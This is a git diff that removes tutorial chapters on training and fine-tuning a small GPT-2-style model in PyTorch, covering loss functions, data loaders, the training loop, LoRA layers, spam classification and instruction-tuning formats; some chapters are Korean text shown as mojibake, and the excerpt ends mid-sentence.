[**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which instead of getting k samples with the most probability, it **organizes** all the resulting **vocabulary** by probabilities and **sums** them from the highest probability to the lowest until a **threshold is reached**. -> -> Then, **only those words** of the vocabulary will be considered according to their relative probabilities -> -> This allows to not need to select a number of `k` samples, as the optimal k might be different on each case, but **only a threshold**. -> -> _Note that this improvement isn't included in the previous code._ - -> [!NOTE] -> Another way to improve the generated text is by using **Beam search** instead of the greedy search sued in this example.\ -> Unlike greedy search, which selects the most probable next word at each step and builds a single sequence, **beam search keeps track of the top ๐‘˜ k highest-scoring partial sequences** (called "beams") at each step. By exploring multiple possibilities simultaneously, it balances efficiency and quality, increasing the chances of **finding a better overall** sequence that might be missed by the greedy approach due to early, suboptimal choices. -> -> _Note that this improvement isn't included in the previous code._ - -### Loss functions - -The **`calc_loss_batch`** function calculates the cross entropy of the a prediction of a single batch.\ -The **`calc_loss_loader`** gets the cross entropy of all the batches and calculates the **average cross entropy**. - -```python -# Define loss functions -def calc_loss_batch(input_batch, target_batch, model, device): - input_batch, target_batch = input_batch.to(device), target_batch.to(device) - logits = model(input_batch) - loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten()) - return loss - -def calc_loss_loader(data_loader, model, device, num_batches=None): - total_loss = 0. - if len(data_loader) == 0: - return float("nan") - elif num_batches is None: - num_batches = len(data_loader) - else: - # Reduce the number of batches to match the total number of batches in the data loader - # if num_batches exceeds the number of batches in the data loader - num_batches = min(num_batches, len(data_loader)) - for i, (input_batch, target_batch) in enumerate(data_loader): - if i < num_batches: - loss = calc_loss_batch(input_batch, target_batch, model, device) - total_loss += loss.item() - else: - break - return total_loss / num_batches -``` - -> [!NOTE] -> **Gradient clipping** is a technique used to enhance **training stability** in large neural networks by setting a **maximum threshold** for gradient magnitudes. When gradients exceed this predefined `max_norm`, they are scaled down proportionally to ensure that updates to the modelโ€™s parameters remain within a manageable range, preventing issues like exploding gradients and ensuring more controlled and stable training. -> -> _Note that this improvement isn't included in the previous code._ -> -> Check the following example: - -
- -### Loading Data - -The functions `create_dataloader_v1` and `create_dataloader_v1` were already discussed in a previous section. - -From here note how it's defined that 90% of the text is going to be used for training while the 10% will be used for validation and both sets are stored in 2 different data loaders.\ -Note that some times part of the data set is also left for a testing set to evaluate better the performance of the model. - -Both data loaders are using the same batch size, maximum length and stride and num workers (0 in this case).\ -The main differences are the data used by each, and the the validators is not dropping the last neither shuffling the data is it's not needed for validation purposes. - -Also the fact that **stride is as big as the context length**, means that there won't be overlapping between contexts used to train the data (reduces overfitting but also the training data set). - -Moreover, note that the batch size in this case it 2 to divide the data in 2 batches, the main goal of this is to allow parallel processing and reduce the consumption per batch. - -```python -train_ratio = 0.90 -split_idx = int(train_ratio * len(text_data)) -train_data = text_data[:split_idx] -val_data = text_data[split_idx:] - -torch.manual_seed(123) - -train_loader = create_dataloader_v1( - train_data, - batch_size=2, - max_length=GPT_CONFIG_124M["context_length"], - stride=GPT_CONFIG_124M["context_length"], - drop_last=True, - shuffle=True, - num_workers=0 -) - -val_loader = create_dataloader_v1( - val_data, - batch_size=2, - max_length=GPT_CONFIG_124M["context_length"], - stride=GPT_CONFIG_124M["context_length"], - drop_last=False, - shuffle=False, - num_workers=0 -) -``` - -## Sanity Checks - -The goal is to check there are enough tokens for training, shapes are the expected ones and get some info about the number of tokens used for training and for validation: - -```python -# Sanity checks -if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]: - print("Not enough tokens for the training loader. " - "Try to lower the `GPT_CONFIG_124M['context_length']` or " - "increase the `training_ratio`") - -if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]: - print("Not enough tokens for the validation loader. " - "Try to lower the `GPT_CONFIG_124M['context_length']` or " - "decrease the `training_ratio`") - -print("Train loader:") -for x, y in train_loader: - print(x.shape, y.shape) - -print("\nValidation loader:") -for x, y in val_loader: - print(x.shape, y.shape) - -train_tokens = 0 -for input_batch, target_batch in train_loader: - train_tokens += input_batch.numel() - -val_tokens = 0 -for input_batch, target_batch in val_loader: - val_tokens += input_batch.numel() - -print("Training tokens:", train_tokens) -print("Validation tokens:", val_tokens) -print("All tokens:", train_tokens + val_tokens) -``` - -### Select device for training & pre calculations - -The following code just select the device to use and calculates a training loss and validation loss (without having trained anything yet) as a starting point. - -```python -# Indicate the device to use - -if torch.cuda.is_available(): - device = torch.device("cuda") -elif torch.backends.mps.is_available(): - device = torch.device("mps") -else: - device = torch.device("cpu") - -print(f"Using {device} device.") - -model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes - -# Pre-calculate losses without starting yet -torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader - -with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet - train_loss = calc_loss_loader(train_loader, model, device) - val_loss = calc_loss_loader(val_loader, model, device) - -print("Training loss:", train_loss) -print("Validation loss:", val_loss) -``` - -### Training functions - -The function `generate_and_print_sample` will just get a context and generate some tokens in order to get a feeling about how good is the model at that point. This is called by `train_model_simple` on each step. - -The function `evaluate_model` is called as frequently as indicate to the training function and it's used to measure the train loss and the validation loss at that point in the model training. - -Then the big function `train_model_simple` is the one that actually train the model. It expects: - -- The train data loader (with the data already separated and prepared for training) -- The validator loader -- The **optimizer** to use during training: This is the function that will use the gradients and will update the parameters to reduce the loss. In this case, as you will see, `AdamW` is used, but there are many more. - - `optimizer.zero_grad()` is called to reset the gradients on each round to not accumulate them. - - The **`lr`** param is the **learning rate** which determines the **size of the steps** taken during the optimization process when updating the model's parameters. A **smaller** learning rate means the optimizer **makes smaller updates** to the weights, which can lead to more **precise** convergence but might **slow down** training. A **larger** learning rate can speed up training but **risks overshooting** the minimum of the loss function (**jump over** the point where the loss function is minimized). - - **Weight Decay** modifies the **Loss Calculation** step by adding an extra term that penalizes large weights. This encourages the optimizer to find solutions with smaller weights, balancing between fitting the data well and keeping the model simple preventing overfitting in machine learning models by discouraging the model from assigning too much importance to any single feature. - - Traditional optimizers like SGD with L2 regularization couple weight decay with the gradient of the loss function. However, **AdamW** (a variant of Adam optimizer) decouples weight decay from the gradient update, leading to more effective regularization. -- The device to use for training -- The number of epochs: Number of times to go over the training data -- The evaluation frequency: The frequency to call `evaluate_model` -- The evaluation iteration: The number of batches to use when evaluating the current state of the model when calling `generate_and_print_sample` -- The start context: Which the starting sentence to use when calling `generate_and_print_sample` -- The tokenizer - -```python -# Functions to train the data -def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs, - eval_freq, eval_iter, start_context, tokenizer): - # Initialize lists to track losses and tokens seen - train_losses, val_losses, track_tokens_seen = [], [], [] - tokens_seen, global_step = 0, -1 - - # Main training loop - for epoch in range(num_epochs): - model.train() # Set model to training mode - - for input_batch, target_batch in train_loader: - optimizer.zero_grad() # Reset loss gradients from previous batch iteration - loss = calc_loss_batch(input_batch, target_batch, model, device) - loss.backward() # Calculate loss gradients - optimizer.step() # Update model weights using loss gradients - tokens_seen += input_batch.numel() - global_step += 1 - - # Optional evaluation step - if global_step % eval_freq == 0: - train_loss, val_loss = evaluate_model( - model, train_loader, val_loader, device, eval_iter) - train_losses.append(train_loss) - val_losses.append(val_loss) - track_tokens_seen.append(tokens_seen) - print(f"Ep {epoch+1} (Step {global_step:06d}): " - f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}") - - # Print a sample text after each epoch - generate_and_print_sample( - model, tokenizer, device, start_context - ) - - return train_losses, val_losses, track_tokens_seen - - -def evaluate_model(model, train_loader, val_loader, device, eval_iter): - model.eval() # Set in eval mode to avoid dropout - with torch.no_grad(): - train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter) - val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter) - model.train() # Back to training model applying all the configurations - return train_loss, val_loss - - -def generate_and_print_sample(model, tokenizer, device, start_context): - model.eval() # Set in eval mode to avoid dropout - context_size = model.pos_emb.weight.shape[0] - encoded = text_to_token_ids(start_context, tokenizer).to(device) - with torch.no_grad(): - token_ids = generate_text( - model=model, idx=encoded, - max_new_tokens=50, context_size=context_size - ) - decoded_text = token_ids_to_text(token_ids, tokenizer) - print(decoded_text.replace("\n", " ")) # Compact print format - model.train() # Back to training model applying all the configurations -``` - -> [!NOTE] -> To improve the learning rate there are a couple relevant techniques called **linear warmup** and **cosine decay.** -> -> **Linear warmup** consist on define an initial learning rate and a maximum one and consistently update it after each epoch. This is because starting the training with smaller weight updates decreases the risk of the model encountering large, destabilizing updates during its training phase.\ -> **Cosine decay** is a technique that **gradually reduces the learning rate** following a half-cosine curve **after the warmup** phase, slowing weight updates to **minimize the risk of overshooting** the loss minima and ensure training stability in later phases. -> -> _Note that these improvements aren't included in the previous code._ - -### Start training - -```python -import time -start_time = time.time() - -torch.manual_seed(123) -model = GPTModel(GPT_CONFIG_124M) -model.to(device) -optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1) - -num_epochs = 10 -train_losses, val_losses, tokens_seen = train_model_simple( - model, train_loader, val_loader, optimizer, device, - num_epochs=num_epochs, eval_freq=5, eval_iter=5, - start_context="Every effort moves you", tokenizer=tokenizer -) - -end_time = time.time() -execution_time_minutes = (end_time - start_time) / 60 -print(f"Training completed in {execution_time_minutes:.2f} minutes.") -``` - -### Print training evolution - -With the following function it's possible to print the evolution of the model while it was being trained. - -```python -import matplotlib.pyplot as plt -from matplotlib.ticker import MaxNLocator -import math -def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses): - fig, ax1 = plt.subplots(figsize=(5, 3)) - ax1.plot(epochs_seen, train_losses, label="Training loss") - ax1.plot( - epochs_seen, val_losses, linestyle="-.", label="Validation loss" - ) - ax1.set_xlabel("Epochs") - ax1.set_ylabel("Loss") - ax1.legend(loc="upper right") - ax1.xaxis.set_major_locator(MaxNLocator(integer=True)) - ax2 = ax1.twiny() - ax2.plot(tokens_seen, train_losses, alpha=0) - ax2.set_xlabel("Tokens seen") - fig.tight_layout() - plt.show() - - # Compute perplexity from the loss values - train_ppls = [math.exp(loss) for loss in train_losses] - val_ppls = [math.exp(loss) for loss in val_losses] - # Plot perplexity over tokens seen - plt.figure() - plt.plot(tokens_seen, train_ppls, label='Training Perplexity') - plt.plot(tokens_seen, val_ppls, label='Validation Perplexity') - plt.xlabel('Tokens Seen') - plt.ylabel('Perplexity') - plt.title('Perplexity over Training') - plt.legend() - plt.show() - -epochs_tensor = torch.linspace(0, num_epochs, len(train_losses)) -plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses) -``` - -### Save the model - -It's possible to save the model + optimizer if you want to continue training later: - -```python -# Save the model and the optimizer for later training -torch.save({ - "model_state_dict": model.state_dict(), - "optimizer_state_dict": optimizer.state_dict(), - }, -"/tmp/model_and_optimizer.pth" -) -# Note that this model with the optimizer occupied close to 2GB - -# Restore model and optimizer for training -checkpoint = torch.load("/tmp/model_and_optimizer.pth", map_location=device) - -model = GPTModel(GPT_CONFIG_124M) -model.load_state_dict(checkpoint["model_state_dict"]) -optimizer = torch.optim.AdamW(model.parameters(), lr=5e-4, weight_decay=0.1) -optimizer.load_state_dict(checkpoint["optimizer_state_dict"]) -model.train(); # Put in training mode -``` - -Or just the model if you are planing just on using it: - -```python -# Save the model -torch.save(model.state_dict(), "model.pth") - -# Load it -model = GPTModel(GPT_CONFIG_124M) - -model.load_state_dict(torch.load("model.pth", map_location=device)) - -model.eval() # Put in eval mode -``` - -## Loading GPT2 weights - -There 2 quick scripts to load the GPT2 weights locally. For both you can clone the repository [https://github.com/rasbt/LLMs-from-scratch](https://github.com/rasbt/LLMs-from-scratch) locally, then: - -- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py) will download all the weights and transform the formats from OpenAI to the ones expected by our LLM. The script is also prepared with the needed configuration and with the prompt: "Every effort moves you" -- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) allows you to load any of the GPT2 weights locally (just change the `CHOOSE_MODEL` var) and predict text from some prompts. - -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) - diff --git a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md deleted file mode 100644 index 4c3302dee..000000000 --- a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md +++ /dev/null @@ -1,61 +0,0 @@ -# 7.0. LoRA ๊ฐœ์„  ์‚ฌํ•ญ - -## LoRA ๊ฐœ์„  ์‚ฌํ•ญ - -> [!TIP] -> **LoRA๋Š” ์ด๋ฏธ ํ›ˆ๋ จ๋œ ๋ชจ๋ธ์„ ๋ฏธ์„ธ ์กฐ์ •ํ•˜๋Š” ๋ฐ ํ•„์š”ํ•œ ๊ณ„์‚ฐ๋Ÿ‰์„ ๋งŽ์ด ์ค„์ž…๋‹ˆ๋‹ค.** - -LoRA๋Š” ๋ชจ๋ธ์˜ **์ž‘์€ ๋ถ€๋ถ„**๋งŒ ๋ณ€๊ฒฝํ•˜์—ฌ **๋Œ€ํ˜• ๋ชจ๋ธ**์„ ํšจ์œจ์ ์œผ๋กœ ๋ฏธ์„ธ ์กฐ์ •ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ํ›ˆ๋ จํ•ด์•ผ ํ•  ๋งค๊ฐœ๋ณ€์ˆ˜์˜ ์ˆ˜๋ฅผ ์ค„์—ฌ **๋ฉ”๋ชจ๋ฆฌ**์™€ **๊ณ„์‚ฐ ์ž์›**์„ ์ ˆ์•ฝํ•ฉ๋‹ˆ๋‹ค. ๊ทธ ์ด์œ ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: - -1. **ํ›ˆ๋ จ ๊ฐ€๋Šฅํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜ ์ˆ˜ ๊ฐ์†Œ**: ๋ชจ๋ธ์˜ ์ „์ฒด ๊ฐ€์ค‘์น˜ ํ–‰๋ ฌ์„ ์—…๋ฐ์ดํŠธํ•˜๋Š” ๋Œ€์‹ , LoRA๋Š” ๊ฐ€์ค‘์น˜ ํ–‰๋ ฌ์„ ๋‘ ๊ฐœ์˜ ๋” ์ž‘์€ ํ–‰๋ ฌ( **A**์™€ **B**๋ผ๊ณ  ํ•จ)๋กœ **๋ถ„ํ• **ํ•ฉ๋‹ˆ๋‹ค. ์ด๋ ‡๊ฒŒ ํ•˜๋ฉด ํ›ˆ๋ จ์ด **๋” ๋นจ๋ผ์ง€๊ณ ** ์—…๋ฐ์ดํŠธํ•ด์•ผ ํ•  ๋งค๊ฐœ๋ณ€์ˆ˜๊ฐ€ ์ ๊ธฐ ๋•Œ๋ฌธ์— **๋ฉ”๋ชจ๋ฆฌ**๊ฐ€ **๋œ ํ•„์š”**ํ•ฉ๋‹ˆ๋‹ค. - -1. ์ด๋Š” ๋ ˆ์ด์–ด(ํ–‰๋ ฌ)์˜ ์ „์ฒด ๊ฐ€์ค‘์น˜ ์—…๋ฐ์ดํŠธ๋ฅผ ๊ณ„์‚ฐํ•˜๋Š” ๋Œ€์‹ , ๋‘ ๊ฐœ์˜ ๋” ์ž‘์€ ํ–‰๋ ฌ์˜ ๊ณฑ์œผ๋กœ ๊ทผ์‚ฌํ•˜์—ฌ ์—…๋ฐ์ดํŠธ๋ฅผ ๊ณ„์‚ฐํ•˜๋Š” ๊ฒƒ์„ ์ค„์ด๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค:\ - -
- -2. **์›๋ž˜ ๋ชจ๋ธ ๊ฐ€์ค‘์น˜ ๋ณ€๊ฒฝ ์—†์Œ**: LoRA๋Š” ์›๋ž˜ ๋ชจ๋ธ ๊ฐ€์ค‘์น˜๋ฅผ ๋™์ผํ•˜๊ฒŒ ์œ ์ง€ํ•˜๊ณ  **์ƒˆ๋กœ์šด ์ž‘์€ ํ–‰๋ ฌ**(A์™€ B)๋งŒ ์—…๋ฐ์ดํŠธํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋ชจ๋ธ์˜ ์›๋ž˜ ์ง€์‹์ด ๋ณด์กด๋˜๋ฉฐ ํ•„์š”ํ•œ ๋ถ€๋ถ„๋งŒ ์กฐ์ •ํ•  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์—์„œ ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค. -3. **ํšจ์œจ์ ์ธ ์ž‘์—…๋ณ„ ๋ฏธ์„ธ ์กฐ์ •**: ๋ชจ๋ธ์„ **์ƒˆ๋กœ์šด ์ž‘์—…**์— ์ ์‘์‹œํ‚ค๊ณ  ์‹ถ์„ ๋•Œ, ๋‚˜๋จธ์ง€ ๋ชจ๋ธ์€ ๊ทธ๋Œ€๋กœ ๋‘๊ณ  **์ž‘์€ LoRA ํ–‰๋ ฌ**(A์™€ B)๋งŒ ํ›ˆ๋ จํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์ „์ฒด ๋ชจ๋ธ์„ ์žฌํ›ˆ๋ จํ•˜๋Š” ๊ฒƒ๋ณด๋‹ค **ํ›จ์”ฌ ๋” ํšจ์œจ์ **์ž…๋‹ˆ๋‹ค. -4. **์ €์žฅ ํšจ์œจ์„ฑ**: ๋ฏธ์„ธ ์กฐ์ • ํ›„, ๊ฐ ์ž‘์—…์— ๋Œ€ํ•ด **์ „์ฒด ์ƒˆ๋กœ์šด ๋ชจ๋ธ**์„ ์ €์žฅํ•˜๋Š” ๋Œ€์‹ , ์ „์ฒด ๋ชจ๋ธ์— ๋น„ํ•ด ๋งค์šฐ ์ž‘์€ **LoRA ํ–‰๋ ฌ**๋งŒ ์ €์žฅํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋„ˆ๋ฌด ๋งŽ์€ ์ €์žฅ ๊ณต๊ฐ„์„ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  ๋ชจ๋ธ์„ ์—ฌ๋Ÿฌ ์ž‘์—…์— ์‰ฝ๊ฒŒ ์ ์‘์‹œํ‚ฌ ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. - -๋ฏธ์„ธ ์กฐ์ • ์ค‘ Linear ๋Œ€์‹  LoraLayers๋ฅผ ๊ตฌํ˜„ํ•˜๊ธฐ ์œ„ํ•ด ์—ฌ๊ธฐ์—์„œ ์ด ์ฝ”๋“œ๊ฐ€ ์ œ์•ˆ๋ฉ๋‹ˆ๋‹ค [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb): -```python -import math - -# Create the LoRA layer with the 2 matrices and the alpha -class LoRALayer(torch.nn.Module): -def __init__(self, in_dim, out_dim, rank, alpha): -super().__init__() -self.A = torch.nn.Parameter(torch.empty(in_dim, rank)) -torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5)) # similar to standard weight initialization -self.B = torch.nn.Parameter(torch.zeros(rank, out_dim)) -self.alpha = alpha - -def forward(self, x): -x = self.alpha * (x @ self.A @ self.B) -return x - -# Combine it with the linear layer -class LinearWithLoRA(torch.nn.Module): -def __init__(self, linear, rank, alpha): -super().__init__() -self.linear = linear -self.lora = LoRALayer( -linear.in_features, linear.out_features, rank, alpha -) - -def forward(self, x): -return self.linear(x) + self.lora(x) - -# Replace linear layers with LoRA ones -def replace_linear_with_lora(model, rank, alpha): -for name, module in model.named_children(): -if isinstance(module, torch.nn.Linear): -# Replace the Linear layer with LinearWithLoRA -setattr(model, name, LinearWithLoRA(module, rank, alpha)) -else: -# Recursively apply the same function to child modules -replace_linear_with_lora(module, rank, alpha) -``` -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md b/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md deleted file mode 100644 index 447524b91..000000000 --- a/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md +++ /dev/null @@ -1,117 +0,0 @@ -# 7.1. Fine-Tuning for Classification - -## What is - -Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch. - -> [!NOTE] -> As pre-training a LLM that "understands" the text is pretty expensive it's usually easier and cheaper to to fine-tune open source pre-trained models to perform a specific task we want it to perform. - -> [!TIP] -> The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not). - -## Preparing the data set - -### Data set size - -Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)_._ - -This data set contains much more examples of "not spam" that of "spam", therefore the book suggest to **only use as many examples of "not spam" as of "spam"** (therefore, removing from the training data all the extra examples). In this case, this was 747 examples of each. - -Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**. - -- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation. - - This means that although the data included in this data set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one. -- In contrast, the **test set** is used **only after** the model has been fully trained and all adjustments are complete; it provides an unbiased assessment of the model's ability to generalize to new, unseen data. This final evaluation on the test set gives a realistic indication of how the model is expected to perform in real-world applications. - -### Entries length - -As the training example expects entries (emails text in this case) of the same length, it was decided to make every entry as large as the largest one by adding the ids of `<|endoftext|>` as padding. - -### Initialize the model - -Using the open-source pre-trained weights initialize the model to train. We have already done this before and follow the instructions of [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) you can easily do it. - -## Classification head - -In this specific example (predicting if a text is spam or not), we are not interested in fine tune according to the complete vocabulary of GPT2 but we only want the new model to say if the email is spam (1) or not (0). Therefore, we are going to **modify the final layer that** gives the probabilities per token of the vocabulary for one that only gives the probabilities of being spam or not (so like a vocabulary of 2 words). - -```python -# This code modified the final layer with a Linear one with 2 outs -num_classes = 2 -model.out_head = torch.nn.Linear( - -in_features=BASE_CONFIG["emb_dim"], - -out_features=num_classes -) -``` - -## Parameters to tune - -In order to fine tune fast it's easier to not fine tune all the parameters but only some final ones. This is because it's known that the lower layers generally capture basic language structures and semantics applicable. So, just **fine tuning the last layers is usually enough and faster**. - -```python -# This code makes all the parameters of the model unrtainable -for param in model.parameters(): - param.requires_grad = False - -# Allow to fine tune the last layer in the transformer block -for param in model.trf_blocks[-1].parameters(): - param.requires_grad = True - -# Allow to fine tune the final layer norm -for param in model.final_norm.parameters(): - -param.requires_grad = True -``` - -## Entries to use for training - -In previos sections the LLM was trained reducing the loss of every predicted token, even though almost all the predicted tokens were in the input sentence (only 1 at the end was really predicted) in order for the model to understand better the language. - -In this case we only care on the model being able to predict if the model is spam or not, so we only care about the last token predicted. Therefore, it's needed to modify out previous training loss functions to only take into account that token. - -This is implemented in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) as: - -```python -def calc_accuracy_loader(data_loader, model, device, num_batches=None): - model.eval() - correct_predictions, num_examples = 0, 0 - - if num_batches is None: - num_batches = len(data_loader) - else: - num_batches = min(num_batches, len(data_loader)) - for i, (input_batch, target_batch) in enumerate(data_loader): - if i < num_batches: - input_batch, target_batch = input_batch.to(device), target_batch.to(device) - - with torch.no_grad(): - logits = model(input_batch)[:, -1, :] # Logits of last output token - predicted_labels = torch.argmax(logits, dim=-1) - - num_examples += predicted_labels.shape[0] - correct_predictions += (predicted_labels == target_batch).sum().item() - else: - break - return correct_predictions / num_examples - - -def calc_loss_batch(input_batch, target_batch, model, device): - input_batch, target_batch = input_batch.to(device), target_batch.to(device) - logits = model(input_batch)[:, -1, :] # Logits of last output token - loss = torch.nn.functional.cross_entropy(logits, target_batch) - return loss -``` - -Note how for each batch we are only interested in the **logits of the last token predicted**. - -## Complete GPT2 fine-tune classification code - -You can find all the code to fine-tune GPT2 to be a spam classifier in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb) - -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) - diff --git a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md deleted file mode 100644 index acb2d000e..000000000 --- a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md +++ /dev/null @@ -1,100 +0,0 @@ -# 7.2. ์ง€์นจ์„ ๋”ฐ๋ฅด๊ธฐ ์œ„ํ•œ ๋ฏธ์„ธ ์กฐ์ • - -> [!TIP] -> ์ด ์„น์…˜์˜ ๋ชฉํ‘œ๋Š” **ํ…์ŠคํŠธ๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๊ฒƒ๋ฟ๋งŒ ์•„๋‹ˆ๋ผ ์ง€์นจ์„ ๋”ฐ๋ฅด๋„๋ก ์ด๋ฏธ ์‚ฌ์ „ ํ›ˆ๋ จ๋œ ๋ชจ๋ธ์„ ๋ฏธ์„ธ ์กฐ์ •ํ•˜๋Š” ๋ฐฉ๋ฒ•**์„ ๋ณด์—ฌ์ฃผ๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, ์ฑ—๋ด‡์œผ๋กœ์„œ ์ž‘์—…์— ์‘๋‹ตํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. - -## ๋ฐ์ดํ„ฐ์…‹ - -LLM์„ ์ง€์นจ์„ ๋”ฐ๋ฅด๋„๋ก ๋ฏธ์„ธ ์กฐ์ •ํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” LLM์„ ๋ฏธ์„ธ ์กฐ์ •ํ•  ์ง€์นจ๊ณผ ์‘๋‹ต์ด ํฌํ•จ๋œ ๋ฐ์ดํ„ฐ์…‹์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. LLM์„ ์ง€์นจ์„ ๋”ฐ๋ฅด๋„๋ก ํ›ˆ๋ จํ•˜๋Š” ๋ฐ๋Š” ๋‹ค์–‘ํ•œ ํ˜•์‹์ด ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด: - -- Apply Alpaca ํ”„๋กฌํ”„ํŠธ ์Šคํƒ€์ผ ์˜ˆ์ œ: -```csharp -Below is an instruction that describes a task. Write a response that appropriately completes the request. - -### Instruction: -Calculate the area of a circle with a radius of 5 units. - -### Response: -The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging in the radius of 5 units: - -\( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units. -``` -- Phi-3 ํ”„๋กฌํ”„ํŠธ ์Šคํƒ€์ผ ์˜ˆ์‹œ: -```vbnet -<|User|> -Can you explain what gravity is in simple terms? - -<|Assistant|> -Absolutely! Gravity is a force that pulls objects toward each other. -``` -์ด๋Ÿฌํ•œ ์ข…๋ฅ˜์˜ ๋ฐ์ดํ„ฐ ์„ธํŠธ๋กœ LLM์„ ํ›ˆ๋ จ์‹œํ‚ค๋Š” ๊ฒƒ์€ ๋‹จ์ˆœํ•œ ์›์‹œ ํ…์ŠคํŠธ ๋Œ€์‹  LLM์ด ๋ฐ›๋Š” ์งˆ๋ฌธ์— ๋Œ€ํ•ด ๊ตฌ์ฒด์ ์ธ ์‘๋‹ต์„ ์ œ๊ณตํ•ด์•ผ ํ•œ๋‹ค๋Š” ๊ฒƒ์„ ์ดํ•ดํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋ฉ๋‹ˆ๋‹ค. - -๋”ฐ๋ผ์„œ ์š”์ฒญ๊ณผ ์‘๋‹ต์ด ํฌํ•จ๋œ ๋ฐ์ดํ„ฐ ์„ธํŠธ๋กœ ์ˆ˜ํ–‰ํ•ด์•ผ ํ•  ์ฒซ ๋ฒˆ์งธ ์ž‘์—… ์ค‘ ํ•˜๋‚˜๋Š” 